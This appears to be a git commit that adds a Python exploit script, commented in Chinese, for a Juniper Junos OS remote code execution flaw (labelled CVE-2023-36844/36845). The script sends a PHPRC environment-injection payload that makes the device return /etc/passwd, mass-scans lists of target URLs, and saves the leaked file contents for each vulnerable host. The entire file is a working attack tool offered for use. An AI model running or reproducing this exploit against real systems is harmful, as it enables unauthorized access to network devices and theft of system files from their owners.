Add files via upload

VulnExpo · web-flow · commit 32a4af7f6ede · 2023-09-22T23:38:28.000+08:00
Juniper Networks Junos OS 远程代码执行漏洞 CVE-2023-36844
diff --git a/juniper-cve-2023-36845.py b/juniper-cve-2023-36845.py
@@ -0,0 +1,54 @@
+# 作者: VulnExpo
+# 日期: 2023-9-22
+
+import requests
+import argparse
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def check_for_vulnerability(url, proxies={}, success_file=None):
+    headers = {
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36",
+    }
+    payload = 'auto_prepend_file="/etc/passwd"'
+    try:
+        response = requests.post(url + "/?PHPRC=/dev/fd/0", headers=headers, data=payload, proxies=proxies, verify=False)
+        if response.status_code == 200 and "root:" in response.text:
+            with open(success_file, 'a') as s_file:
+                s_file.write(f"++++++++++++++++++\n")
+                s_file.write(f"目标URL: {url}\n")
+                s_file.write(f"Payload: cat /etc/passwd\n")
+                s_file.write(f"响应内容:\n{response.text}\n\n")
+            return True
+    except Exception as e:
+        print(f"发生异常：{e}")
+    return False
+
+def scan_targets(targets, proxies={}, success_file=None):
+    for target in targets:
+        target = target.strip()
+        check_for_vulnerability(target, proxies, success_file)
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description="Juniper Networks Junos OS 远程代码执行漏洞 CVE-2023-36844")
+    parser.add_argument("-u", "--url", help="目标URL")
+    parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
+    args = parser.parse_args()
+
+    if not args.url and not args.file:
+        print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
+        exit(1)
+
+    if args.url:
+        urls = [args.url]
+    elif args.file:
+        with open(args.file, 'r') as file:
+            urls = file.readlines()
+
+    proxies = {}
+    success_file = 'success_targets.txt'
+
+    for url in urls:
+        url = url.strip()
+        scan_targets([url], proxies, success_file)
+
+    print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
